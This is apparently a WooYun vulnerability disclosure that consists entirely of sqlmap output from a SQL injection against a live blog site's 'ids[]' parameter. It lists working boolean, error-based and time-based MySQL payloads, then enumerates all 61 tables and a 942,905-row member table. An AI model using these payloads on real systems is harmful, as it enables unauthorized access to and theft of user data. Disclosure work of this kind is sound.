WooYun.org

---
Parameter: ids[] (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: allsel=on&ids[]=a) AND 9396=9396 AND (5600=5600
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: allsel=on&ids[]=a) AND (SELECT 9889 FROM(SELECT COUNT(*),CONCAT(0x7
176767a71,(SELECT (ELT(9889=9889,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFOR
MATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1816=1816
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: allsel=on&ids[]=a) AND (SELECT * FROM (SELECT(SLEEP(5)))MReN) AND (
7930=7930
---
[16:25:24] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: cublog
[61 tables]
+---------------------------+
| tbl_album                 |
| tbl_attachments           |
| tbl_blog                  |
| tbl_blog_draft            |
| tbl_blog_field_1          |
| tbl_blog_field_10         |
| tbl_blog_field_11         |
| tbl_blog_field_12         |
| tbl_blog_field_13         |
| tbl_blog_field_14         |
| tbl_blog_field_16         |
| tbl_blog_field_17         |
| tbl_blog_field_18         |
| tbl_blog_field_2          |
| tbl_blog_field_20         |
| tbl_blog_field_21         |
| tbl_blog_field_22         |
| tbl_blog_field_24         |
| tbl_blog_field_25         |
| tbl_blog_field_26         |
| tbl_blog_field_27         |
| tbl_blog_field_28         |
| tbl_blog_field_29         |
| tbl_blog_field_3          |
| tbl_blog_field_30         |
| tbl_blog_field_4          |
| tbl_blog_field_5          |
| tbl_blog_field_6          |
| tbl_blog_field_8          |
| tbl_blog_field_9          |
| tbl_class                 |
| tbl_collection_links      |
| tbl_common_config         |
| tbl_index_del             |
| tbl_issue                 |
| tbl_link                  |
| tbl_member                |
| tbl_member_failedlogin    |
| tbl_member_field          |
| tbl_member_friend         |
| tbl_member_group          |
| tbl_member_notification   |
| tbl_member_reply          |
| tbl_member_set            |
| tbl_member_visitor        |
| tbl_moving_error_url      |
| tbl_outside_articles      |
| tbl_pic                   |
| tbl_pm_private_memberlist |
| tbl_pm_private_message    |
| tbl_pm_system_message     |
| tbl_pm_system_status      |
| tbl_sitemap               |
| tbl_sitemap_log           |
| tbl_special               |
| tbl_special_articles      |
| tbl_spider_moving         |
| tbl_user_sinaid           |
| tbl_zhuanti_excels        |
| tbl_zhuanti_keywords      |
| uchome_space              |
+---------------------------+
Database: cublog
+------------+---------+
| Table      | Entries |
+------------+---------+
| tbl_member | 942905  |
+------------+---------+